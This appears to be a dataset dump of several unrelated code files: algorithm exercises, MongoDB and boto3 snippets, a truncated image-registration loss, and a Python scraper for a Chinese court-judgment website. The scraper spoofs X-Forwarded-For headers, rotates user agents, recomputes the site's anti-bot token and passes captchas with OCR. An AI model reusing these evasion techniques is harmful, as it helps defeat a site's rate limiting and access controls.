index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
22,000 | d6be610c82d30205676c8a425190cf2d54d96e65 | """
Maximum Unsorted Subarray
Problem Description
Given an array A of non-negative integers of size N. Find the minimum sub-array Al, Al+1 ,..., Ar such that if we sort(in ascending order) that sub-array, then the whole array should get sorted. If A is already sorted, output -1.
Problem Constraints
1 <= N <= 1000000
1 <= A[i] <= 1000000
Input Format
First and only argument is an array of non-negative integers of size N.
Output Format
Return an array of length 2 where First element denotes the starting index(0-based) and second element denotes the ending index(0-based) of the sub-array. If the array is already sorted, return an array containing only one element i.e. -1.
Example Input
Input 1:
A = [1, 3, 2, 4, 5]
Input 2:
A = [1, 2, 3, 4, 5]
Example Output
Output 1:
[1, 2]
Output 2:
[-1]
Example Explanation
Explanation 1:
If we sort the sub-array A1, A2, then the whole array A gets sorted.
Explanation 2:
A is already sorted.
"""
class Solution:
# @param A : list of integers
# @return a list of integers
def subUnsort(self, A):
n = len(A)
left_index = -1
right_index = -1
B = sorted(A)
if A == B:
return [-1]
for i in range(n):
if A[i] != B[i]:
left_index = i
break
for i in range(n-1,-1,-1):
if A[i] != B[i]:
right_index = i
break
return [left_index, right_index]
|
22,001 | 56185cf8a8f3b1e35095ef523340ca52fbb21097 | # Jared Asch
# Softdev2 pd06
# K06 -- Yummy Mongo Py
# 2019-03-01
import pymongo
SERVER_IP = "142.93.202.60"
connection = pymongo.MongoClient(SERVER_IP)
db = connection.test
collection = db["primer-dataset"]
def findBorough(b):
return list(collection.find({"borough": b}))
def findZip(z):
return list(collection.find({"address.zip": z}))
def findZipGrade(zip, grade):
return list(collection.find({"address.zip": zip, "grades.0.grade": grade}))
def findZipScore(zip, score):
return list(collection.find({"address.zip": zip, "grades.0.score": {"$lt": score}}))
print(findBorough("Manhattan"))
print(findZip("10462"))
print(findZipGrade("10462", "A"))
print(findZipScore("10462", 10))
|
22,002 | f148cf0cdcab7616075a1e190f272a553dbc908b | # -*- coding: UTF-8 -*-
import execjs
import json
import logging
import random
import re
import requests
import time
import urllib
import FileOperations
class WenShu:
def __init__(self):
# Init default parameters
self.item_in_page = 20
self.case_brief = dict()
# Init log
self._init_log()
self.session = requests.Session()
# Init url list
self.url_list = {'list_url': 'http://wenshu.court.gov.cn/list/list/',
'waf_captcha_url': 'http://wenshu.court.gov.cn/waf_captcha/',
'waf_verify_url': 'http://wenshu.court.gov.cn/waf_verify.htm',
'list_content_url': 'http://wenshu.court.gov.cn/List/ListContent',
'validate_code_url': 'http://wenshu.court.gov.cn/User/ValidateCode',
'check_visit_code_url': 'http://wenshu.court.gov.cn/Content/CheckVisitCode',
'create_code_url': 'http://wenshu.court.gov.cn/ValiCode/CreateCode/'
}
# Init default header
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0',
'X-Forwarded-For': '{}.{}.{}.{},153.88.176.160'.format(random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254))
}
self.headers1 = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8",
"Host": "wenshu.court.gov.cn",
"Proxy-Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
}
self.headers2 = {
"Accept": "*/*",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": "wenshu.court.gov.cn",
"Origin": "http://wenshu.court.gov.cn",
"Proxy-Connection": "keep-alive",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
# Load ua list
with open('ua_list.json', 'r') as f:
self.ua_list = json.load(f)
ua = random.choice(self.ua_list)
self.headers1['User-Agent'] = ua
self.headers2['User-Agent'] = ua
# Init default session
# self.sess, self.vl5x = self.get_sess()
def __str__(self):
return self.__class__.__name__
def _init_log(self):
# Create logger
self.logger = logging.getLogger()
self.logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
self.ch = logging.StreamHandler()
self.ch.setLevel(logging.INFO)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
self.ch.setFormatter(formatter)
# add ch to logger
self.logger.addHandler(self.ch)
def __del__(self):
self.logger.removeHandler(self.ch)
def set_search_criteria(self, search_criteria):
self.logger.info("Set search criteria to {}".format(search_criteria))
self.search_criteria = search_criteria
def get_total_item_number(self):
self.logger.info("Get total case number of {}".format(self.search_criteria))
raw = self.load_page(1)
self.logger.debug(raw)
total_number = re.search('"Count":"([0-9]+)"', raw)
if total_number:
self.logger.info("total item of {} is {}".format(self.search_criteria, total_number.group(1)))
return int(total_number.group(1))
else:
self.logger.info("Failed to found total item of {}".format(self.search_criteria))
return None
def get_guid(self):
self.logger.info("Get guid...")
# 获取guid参数
js1 = '''
function getGuid() {
var guid = createGuid() + createGuid() + "-" + createGuid() + "-" + createGuid() + createGuid() + "-" + createGuid() + createGuid() + createGuid(); //CreateGuid();
return guid;
}
var createGuid = function () {
return (((1 + Math.random()) * 0x10000) | 0).toString(16).substring(1);
}
'''
ctx1 = execjs.compile(js1)
guid = (ctx1.call("getGuid"))
self.logger.info("Guid is {}".format(guid))
return guid
def get_number(self, guid):
self.logger.info("Get number...")
# 获取number
code_url = "http://wenshu.court.gov.cn/ValiCode/GetCode"
data = {
'guid': guid
}
headers = self.headers1
while True:
req1 = self.session.post(code_url, headers=headers, data=data)
number = req1.text
self.logger.info("Number is {}".format(number))
if len(number) == 8:
break
else:
self.logger.info("Invalid number, sleep 10s and retry")
time.sleep(10)
return number
def get_vjkl5(self, guid, number):
self.logger.info("Get vjkl5...")
# 获取cookie中的vjkl5
url = "http://wenshu.court.gov.cn/list/list/?sorttype=1&number=" + number \
+ "&guid=" + guid \
+ "&conditions=searchWord+QWJS+++" + urllib.parse.quote(self.search_criteria)
headers = self.headers1
while True:
req1 = self.session.get(url=url, headers=headers)
self.logger.debug(f"req1 is {req1}")
if req1.status_code == 200:
vjkl5 = req1.cookies["vjkl5"]
break
else:
self.logger.info(f"Get vjkl5 failed. Sleep 10s and retry")
time.sleep(10)
self.logger.debug(f"vjkl5 is {vjkl5}")
return vjkl5
def get_vl5x(self, vjkl5):
self.logger.info("Get vl5x...")
#p = execjs.compile(jswenshu.base_64 + jswenshu.sha1 + jswenshu.md5 + jswenshu.js_strToLong + jswenshu.js)
#strlength = p.call('strToLong', vjkl5)
#funcIndex = strlength % 200
#func_s = 'makeKey_' + str(funcIndex)
#vl5x = p.call(func_s, vjkl5)
#self.logger.debug("vl5x is {}".format(vl5x))
#return vl5x
# 根据vjkl5获取参数vl5x
js = ""
fp1 = open('./sha1.js')
js += fp1.read()
fp1.close()
fp2 = open('./md5.js')
js += fp2.read()
fp2.close()
fp3 = open('./base64.js')
js += fp3.read()
fp3.close()
fp4 = open('./vl5x.js')
js += fp4.read()
fp4.close()
ctx2 = execjs.compile(js)
vl5x = (ctx2.call('vl5x', vjkl5))
self.logger.debug("vl5x is {}".format(vl5x))
return vl5x
def get_valid_code(self):
# cookie访问次数过多
headers = self.headers2
#sess, vl5x = getSess()
#ua = random.choice(ua_list)
remind_captcha = self.session.get('http://wenshu.court.gov.cn/User/ValidateCode', headers=headers)
with open('captcha.jpg', 'wb') as f:
f.write(remind_captcha.content)
#img = retrive_img(remind_captcha)
captcha = input("What's the code:")
captcha_data = {
'ValidateCode': captcha
}
self.session.post('http://wenshu.court.gov.cn/Content/CheckVisitCode', headers=headers, data=captcha_data)
print('getFirstPage response content is remind retry again')
def _get_court_list(self, data):
headers = self.headers2
headers['User-Agent'] = random.choice(self.ua_list)
r = self.session.post('http://wenshu.court.gov.cn/List/CourtTreeContent', headers=headers, data=data)
data = json.loads(r.json())
court_list = [ c['Key'] for c in data[0]['Child'] if c['Key'] ]
return court_list
def get_mid_court_list(self, region):
data = {
#法院地域:四川省
"Param": "法院地域:" + region,
"parval": region
}
return self._get_court_list(data)
def get_court_list(self, mid_court):
data = {
"Param": "中级法院:" + mid_court,
"parval": mid_court
}
return self._get_court_list(data)
def load_page(self, index):
while True:
guid = self.get_guid()
number = self.get_number(guid)
vjkl5 = self.get_vjkl5(guid, number)
vl5x = self.get_vl5x(vjkl5)
headers = self.headers2
headers['User-Agent'] = random.choice(self.ua_list)
# 获取数据
url = self.url_list['list_content_url']
data = {
"Param": self.search_criteria,
"Index": index,
"Page": self.item_in_page,
"Order": "法院层级",
"Direction": "asc",
"vl5x": vl5x,
"number": number,
"guid": guid
}
try:
r = self.session.post(url=url, headers=headers, params=data)
# self.logger.debug(data)
if r.status_code == 302:
self.session = requests.Session()
continue
if r.status_code >= 500:
self.logger.info('the service is bad and response_status_code is {}, wait one minute retry'.format(
r.status_code))
time.sleep(60)
continue
# 返回的数据进行序列化
data_unicode = json.loads(r.text)
self.logger.debug('Response is {}'.format(data_unicode))
# data_json = response.json()
if data_unicode == u'remind key':
# cookie 到期
self.logger.info('get_page response content is remind key retry again, sleep 10s...')
#self.session = requests.Session()
#self.get_valid_code()
time.sleep(10)
self.validate_page()
continue
elif data_unicode == u'remind':
self.logger.info('get_page response content is remind retry again')
time.sleep(10)
self.validate_page()
continue
else:
return data_unicode
except Exception as e:
self.logger.info(e)
def validate_page(self):
headers = self.headers1
url = "http://wenshu.court.gov.cn/User/ValidateCode"
url2 = "http://wenshu.court.gov.cn/Content/CheckVisitCode"
r = self.session.get(url=url, headers=headers)
img = FileOperations.MyImageFile('v.jpg')
img.write(r.content)
v_code = img.read()
self.logger.debug("Validation code is {}".format(v_code))
data = {
'ValidateCode': v_code
}
r2 = self.session.post(url=url2, headers=headers, data=data)
self.logger.debug("Response of check visit code is {}".format(r2.text))
def get_case(self, id):
# http://wenshu.court.gov.cn/content/content?DocID=
headers = self.headers1
# 获取数据
url = 'http://wenshu.court.gov.cn/content/content?DocID=' + id
url2 = "http://wenshu.court.gov.cn/CreateContentJS/CreateContentJS.aspx?DocID=" + id
while True:
try:
r = self.session.get(url=url2, headers=headers)
if "VisitRemind" in r.text:
self.validate_page()
continue
else:
break
except Exception as e:
self.logger.debug("{}".format(e))
continue
#raw = self.session.post(url=url2, headers=headers)
# self.logger.debug("Response.text is {}".format(r.text))
raw = re.search('<a.*div>', r.text)
# self.logger.debug("raw string is {}".format(raw.group()))
try:
text_data = re.sub('<.*?>', '', raw.group())
self.logger.debug("text is {}".format(text_data))
except Exception as e:
self.logger.debug("Response text is {}".format(r.text))
return None
return text_data.replace(" ", "")
def get_case_package(self, name_list, id_list, date_list):
docIds = ''
for c in range(len(name_list)):
docIds += id_list[c] + '|' + name_list[c] + '|' + date_list[c] + ','
docIds = docIds[:-1]
self.logger.debug("Doc id used for download zip package is {}".format(docIds))
# print(docIds)
# condition = urllib.parse.quote(self.download_conditions)
# data = {'conditions': condition, 'docIds': docIds, 'keyCode': ''}
# print("Downloading case %s" % (name_list))
# r = requests.post(self.download_url, headers=self.headers, data=data)
# if r.status_code != 200:
# print(r.status_code)
# else:
# self.doc_content = r.content
#
# 根据index来决定抓取哪一页的数据,如果是第一页,同时抓取文书总数
def get_case_list(self, index):
pattern_name = re.compile('"案件名称":"(.*?)"', re.S)
pattern_id = re.compile('"文书ID":"(.*?)"', re.S)
pattern_date = re.compile('"裁判日期":"(.*?)"', re.S)
pattern_case_id = re.compile('"案号":"(.*?)"', re.S)
# pattern_brief = re.compile('"裁判要旨段原文":"(.*?)"', re.S)
pattern_procedure = re.compile('"审判程序":"(.*?)"', re.S)
pattern_court = re.compile('"法院名称":"(.*?)"', re.S)
self.logger.info("Get case list on page {}".format(index))
while True:
raw = self.load_page(index)
self.case_brief = dict()
self.case_brief['name'] = re.findall(pattern_name, raw)
self.case_brief['doc_id'] = re.findall(pattern_id, raw)
self.case_brief['date'] = re.findall(pattern_date, raw)
self.case_brief['case_id'] = re.findall(pattern_case_id, raw)
# self.case_brief['brief'] = re.findall(pattern_brief, raw)
self.case_brief['procedure'] = re.findall(pattern_procedure, raw)
self.case_brief['court'] = re.findall(pattern_court, raw)
self.case_brief['download'] = 'N' * len(self.case_brief['name'])
# if self.case_brief['download'] != '':
# self.logger.debug("Get case list {} on page {}".format(self.case_brief['name'], index))
# break
# else:
# self.logger.info("Get empty page, try it 10 seconds later.")
# time.sleep(10)
return self.case_brief
def main():
pass
if __name__ == "__main__":
main()
# def get_sess(self):
# sess = requests.Session()
# # 获取form表单的参数
# post = execjs.compile("""
# var hexcase = 0;
# var b64pad = "";
# var chrsz = 8;
# function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));}
# function b64_md5(s){ return binl2b64(core_md5(str2binl(s), s.length * chrsz));}
# function str_md5(s){ return binl2str(core_md5(str2binl(s), s.length * chrsz));}
# function hex_hmac_md5(key, data) { return binl2hex(core_hmac_md5(key, data)); }
# function b64_hmac_md5(key, data) { return binl2b64(core_hmac_md5(key, data)); }
# function str_hmac_md5(key, data) { return binl2str(core_hmac_md5(key, data)); }
#
# function md5_vm_test()
# {
# return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72";
# }
#
# function core_md5(x, len)
# {
# x[len >> 5] |= 0x80 << ((len) % 32);
# x[(((len + 64) >>> 9) << 4) + 14] = len;
#
# var a = 1732584193;
# var b = -271733879;
# var c = -1732584194;
# var d = 271733878;
#
# for(var i = 0; i < x.length; i += 16)
# {
# var olda = a;
# var oldb = b;
# var oldc = c;
# var oldd = d;
#
# a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936);
# d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586);
# c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819);
# b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330);
# a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897);
# d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426);
# c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341);
# b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983);
# a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416);
# d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417);
# c = md5_ff(c, d, a, b, x[i+10], 17, -42063);
# b = md5_ff(b, c, d, a, x[i+11], 22, -1990404162);
# a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682);
# d = md5_ff(d, a, b, c, x[i+13], 12, -40341101);
# c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290);
# b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329);
#
# a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510);
# d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
# c = md5_gg(c, d, a, b, x[i+11], 14, 643717713);
# b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302);
# a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691);
# d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083);
# c = md5_gg(c, d, a, b, x[i+15], 14, -660478335);
# b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848);
# a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438);
# d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690);
# c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961);
# b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501);
# a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467);
# d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784);
# c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473);
# b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734);
#
# a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558);
# d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463);
# c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562);
# b = md5_hh(b, c, d, a, x[i+14], 23, -35309556);
# a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
# d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353);
# c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632);
# b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640);
# a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174);
# d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222);
# c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979);
# b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189);
# a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487);
# d = md5_hh(d, a, b, c, x[i+12], 11, -421815835);
# c = md5_hh(c, d, a, b, x[i+15], 16, 530742520);
# b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651);
#
# a = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844);
# d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415);
# c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905);
# b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055);
# a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571);
# d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606);
# c = md5_ii(c, d, a, b, x[i+10], 15, -1051523);
# b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799);
# a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359);
# d = md5_ii(d, a, b, c, x[i+15], 10, -30611744);
# c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380);
# b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649);
# a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070);
# d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379);
# c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259);
# b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551);
#
# a = safe_add(a, olda);
# b = safe_add(b, oldb);
# c = safe_add(c, oldc);
# d = safe_add(d, oldd);
# }
# return Array(a, b, c, d);
#
# }
#
# function md5_cmn(q, a, b, x, s, t)
# {
# return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b);
# }
# function md5_ff(a, b, c, d, x, s, t)
# {
# return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);
# }
# function md5_gg(a, b, c, d, x, s, t)
# {
# return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);
# }
# function md5_hh(a, b, c, d, x, s, t)
# {
# return md5_cmn(b ^ c ^ d, a, b, x, s, t);
# }
# function md5_ii(a, b, c, d, x, s, t)
# {
# return md5_cmn(c ^ (b | (~d)), a, b, x, s, t);
# }
# function core_hmac_md5(key, data)
# {
# var bkey = str2binl(key);
# if(bkey.length > 16) bkey = core_md5(bkey, key.length * chrsz);
#
# var ipad = Array(16), opad = Array(16);
# for(var i = 0; i < 16; i++)
# {
# ipad[i] = bkey[i] ^ 0x36363636;
# opad[i] = bkey[i] ^ 0x5C5C5C5C;
# }
#
# var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);
# return core_md5(opad.concat(hash), 512 + 128);
# }
#
# function safe_add(x, y)
# {
# var lsw = (x & 0xFFFF) + (y & 0xFFFF);
# var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
# return (msw << 16) | (lsw & 0xFFFF);
# }
#
# function bit_rol(num, cnt)
# {
# return (num << cnt) | (num >>> (32 - cnt));
# }
#
# function str2binl(str)
# {
# var bin = Array();
# var mask = (1 << chrsz) - 1;
# for(var i = 0; i < str.length * chrsz; i += chrsz)
# bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32);
# return bin;
# }
#
# function binl2str(bin)
# {
# var str = "";
# var mask = (1 << chrsz) - 1;
# for(var i = 0; i < bin.length * 32; i += chrsz)
# str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
# return str;
# }
#
# function binl2hex(binarray)
# {
# var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
# var str = "";
# for(var i = 0; i < binarray.length * 4; i++)
# {
# str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
# hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF);
# }
# return str;
# }
#
# function binl2b64(binarray)
# {
# var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
# var str = "";
# for(var i = 0; i < binarray.length * 4; i += 3)
# {
# var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
# | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
# | ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
# for(var j = 0; j < 4; j++)
# {
# if(i * 8 + j * 6 > binarray.length * 32) str += b64pad;
# else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
# }
# }
# return str;
# }
#
# function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));}
#
# function getKey(vjkl5){
# var i=25-10-8-2;
# var c=vjkl5;
# var str=c.substr(i,i*5)+c.substr((i+1)*(i+1),3);
# var a=str.substr(i)+str.substr(-4);
# var b=str.substr(4)+a.substr(-i-1);
# c=hex_md5(str).substr(i-1,24);
# return c
# }
#
# """)
# # 当网站访问量过大时 会有302重定向到验证码页面 需要输入验证码 获取session
# while True:
# try:
# response = sess.get(self.url_list['list_url'],
# headers=self.header,
# allow_redirects=False)
# self.logger.debug("Response status code is {}".format(response.status_code))
# if response.status_code == 200:
# vjkl5 = response.cookies.get_dict()['vjkl5']
# vl5x = post.call('getKey', vjkl5)
# self.logger.debug("vjkl5 is %s and vl5x is %s" % (vjkl5, vl5x))
# return sess, vl5x
# if response.status_code == 503:
# # 服务器出现问题
# self.logger.debug('the service is bad and response_status_code is {}, wait one minute retry'.format(
# response.status_code))
# time.sleep(60)
# continue
# if response.status_code == 302:
# while True:
# # 302重定向 需要输入验证码
# home_yzm = sess.get(self.url_list['waf_captcha_url'],
# headers=headers,
# allow_redirects=False,
# timeout=10)
# if home_yzm.status_code >= 500:
# # 服务器出现问题
# self.logger.debug(
# 'the service is bad and response_status_code is {}, wait one minute retry'.format(
# response.status_code))
# time.sleep(60)
# continue
# with open('captcha.jpg', 'wb') as f:
# f.write(home_yzm.content)
# # captcha = result_captcha('captcha.jpg')
# # TODO: Get code automatically
# captcha = input("Enter code: ")
# verify_response = sess.get(self.url['waf_verify_url'] + '?captcha={}'.format(captcha),
# headers=headers,
# allow_redirects=False)
# try:
# value = verify_response.cookies.get_dict()['wafverify']
# except Exception as e:
# # 验证码输入出错 response没有wafverify字段 重试
# self.logger.debug(e)
# continue
# vjkl5 = sess.cookies.get_dict()['vjkl5']
# vl5x = post.call('getKey', vjkl5)
# return sess, vl5x
# except Exception as e:
# self.logger.debug(e)
# continue
# def get_page(self, index=1):
# i = 0
# while i < 5:
# # captcha, guid = self.get_captcha() # 每次请求都要用到
# guid = self.get_guid()
# number = self.get_number(guid)
# self.logger.debug("guid: {}, number: {}".format(guid, number))
#
# form_data = {
# 'Param': self.search_criteria,
# 'Index': index,
# 'Page': 20,
# 'Order': '法院层级',
# 'Direction': 'asc',
# 'vl5x': self.vl5x,
# 'number': number,
# 'guid': guid
# }
# try:
# header = self.header
# header['User-Agent'] = random.choice(self.ua_list)
# response = self.sess.post(self.url_list['list_content_url'], headers=header, data=form_data)
# if response.status_code == 302:
# self.sess, self.vl5x = self.get_sess()
# continue
# if response.status_code >= 500:
# self.logger.info('the service is bad and response_status_code is {}, wait one minute retry'.format(
# response.status_code))
# time.sleep(60)
# continue
# # 返回的数据进行序列化
# data_unicode = json.loads(response.text)
# self.logger.debug('Response is {}'.format(data_unicode))
# # data_json = response.json()
#
# if data_unicode == u'remind key':
# # cookie 到期
# self.logger.info('get_page response content is remind key retry again')
# self.sess, self.vl5x = self.get_sess()
# continue
# elif data_unicode == u'remind':
# # cookie访问次数过多
# self.sess, self.vl5x = self.get_sess()
# ua = random.choice(self.ua_list)
# remind_captcha = self.sess.get(self.url_list['validate_code_url'], headers=header)
# img = retrive_img(remind_captcha)
# img = process_img(img)
# captcha = recognize(img)
# captcha_data = {
# 'ValidateCode': captcha
# }
# sess.post(self.url_list['check_visit_code_url'], headers=header, data=captcha_data)
# print('get_first_page response content is remind retry again')
# continue
# else:
# # return data_unicode
# return data_json
# # 每一页的docID
# id_list = re.findall(u'''.*?"文书ID\\":\\"(.*?)\\",''', data_unicode)
# # count是根据条件condition 筛选出来的总文档数 根据count决定要爬多少页
# data_list = json.loads(data_unicode)
# if len(data_list) == 0:
# time.sleep(2)
# print('getFirstPage response content is [] retry again')
# continue
# count = data_list[0]['Count']
# count = int(count)
# return count, id_list
# except Exception as e:
# print(e)
# i += 1
# if i == 5:
# # message = anyou + ': ' + str(index) + str(e) + ' ' + 'is bad'
# # logger.error(message)
# # print(message)
# return '', ''
# def get_first_page(self):
# # return self.get_page(1)
# return self.load_page(1)
# def get_captcha(self):
# while True:
# try:
# # 获取验证码 发送验证码 验证guid
# yzm = execjs.compile('''
# function createGuid() {
# return (((1 + Math.random()) * 0x10000) | 0).toString(16).substring(1);
# }
# function ref() {
# var guid = createGuid() + createGuid() + "-" + createGuid() + "-" + createGuid() + createGuid() + "-" + createGuid() + createGuid() + createGuid(); //CreateGuid();
# return guid;
# }
# ''')
# guid = yzm.call('ref')
# self.logger.debug("guid is {}".format(guid))
#
# header = self.header
# header['User-Agent'] = random.choice(self.ua_list)
# yzm = self.sess.get(self.url_list['create_code_url'] + '?guid={}'.format(guid), headers=header,
# allow_redirects=False)
# self.logger.debug("yzm is {}".format(yzm))
# if yzm.status_code == 302:
# self.sess, self.vl5x = self.get_sess()
# continue
# if yzm.status_code >= 500:
# self.logger.debug('the service is bad and response_status_code is {}, wait one minute retry'.format(
# yzm.status_code))
# time.sleep(60)
# continue
# with open('captcha.jpg', 'wb') as f:
# f.write(yzm.content)
# # captcha = yundama.result_captcha('captcha.jpg')
# # Todo: use automatically way to get code
# captcha = input("Enter code: ")
# return captcha, guid
# except Exception as e:
# print('get captcah bad retry again')
# print(e) |
22,003 | 9ae0e8f6e975c37487e62c69ceef17b3edef1a94 | class TreeNode:
def __init__(self, value, left=None, right=None):
"""
:type value: int, left: TreeNode, right: TreeNode
"""
self.val = value
self.left = left
self.right = right
def printInorder(self):
if self:
if self.left:
self.left.printInorder()
print(self.val)
if self.right:
self.right.printInorder()
class Solution:
def findLargestBST(self, root):
"""
:type root: TreeNode
:rtype: TreeNode
"""
BSTRoot, _ = self.findBST(root)
return BSTRoot
def findBST(self, root):
"""
:type root: TreeNode
:rtype: (TreeNode, int)
"""
if not root:
return (None, 0)
elif root.left and root.right:
leftBST = self.findBST(root.left)
rightBST = self.findBST(root.right)
if root.left.val <= root.val and root.right.val >= root.val and leftBST[0] is root.left and rightBST[0] is root.right:
return (root, leftBST[1] + rightBST[1] + 1)
else:
return leftBST if leftBST[1] >= rightBST[1] else rightBST
elif root.left:
leftBST = self.findBST(root.left)
if root.left.val <= root.val and leftBST[0] is root.left:
return (root, leftBST[1] + 1)
else:
return leftBST
elif root.right:
rightBST = self.findBST(root.right)
if root.right.val >= root.val and rightBST[0] is root.right:
return (root, rightBST[1] + 1)
else:
return rightBST
else:
return (root, 1)
if __name__ == '__main__':
root = TreeNode(5)
root.left = TreeNode(4)
root.right = TreeNode(16)
root.left.left = TreeNode(7)
root.left.right = TreeNode(5)
root.left.right.left = TreeNode(4)
root.left.right.right = TreeNode(6)
root.left.right.left.left = TreeNode(3)
root.right.left = TreeNode(9)
root.right.right = TreeNode(29)
root.right.right.left = TreeNode(25)
root.right.right.right = TreeNode(42)
rootBST = Solution().findLargestBST(root)
rootBST.printInorder()
|
22,004 | f018d071506b1436efd99af293dda8e0df404575 | import boto3
ec2_client = boto3.client("ec2")
ec2_client.detach_volume(InstanceId="String ID on Instance",
VolumeId="String Volume ID") |
22,005 | 6fe2e229c5b78dd4ebfc41a121cfcea6888385b2 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 6 15:21:40 2018
@author: user
from: https://github.com/voxelmorph/voxelmorph/blob/master/src/losses.py
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
class LCC(nn.Module):
"""
local (over window) normalized cross correlation (square)
"""
def __init__(self, win=[9, 9], eps=1e-5):
super(LCC, self).__init__()
self.win = win
self.eps = eps
def forward(self, I, J):
I2 = I.pow(2)
J2 = J.pow(2)
IJ = I * J
filters = Variable(torch.ones(1, 1, self.win[0], self.win[1]))
if I.is_cuda:#gpu
filters = filters.cuda()
padding = (self.win[0]//2, self.win[1]//2)
I_sum = F.conv2d(I, filters, stride=1, padding=padding)
J_sum = F.conv2d(J, filters, stride=1, padding=padding)
I2_sum = F.conv2d(I2, filters, stride=1, padding=padding)
J2_sum = F.conv2d(J2, filters, stride=1, padding=padding)
IJ_sum = F.conv2d(IJ, filters, stride=1, padding=padding)
win_size = self.win[0]*self.win[1]
u_I = I_sum / win_size
u_J = J_sum / win_size
cross = IJ_sum - u_J*I_sum - u_I*J_sum + u_I*u_J*win_size
I_var = I2_sum - 2 * u_I * I_sum + u_I*u_I*win_size
J_var = J2_sum - 2 * u_J * J_sum + u_J*u_J*win_size
